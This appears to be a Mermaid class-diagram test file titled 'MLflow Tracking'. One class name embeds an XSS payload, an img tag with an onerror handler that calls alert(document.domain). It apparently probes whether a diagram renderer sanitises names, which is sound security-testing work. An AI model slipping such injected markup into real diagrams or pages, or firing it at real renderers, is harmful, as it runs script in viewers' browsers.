---
title: MLflow Tracking
---

classDiagram
Class01 <|-- `AveryLongClass<img src='x' onerror=alert(document.domain)>`
Class03 *-- Class04
Class05 o-- Class06
Class07 .. Class08
Class01 : size()
Class01 : int chimp
Class01 : int gorilla
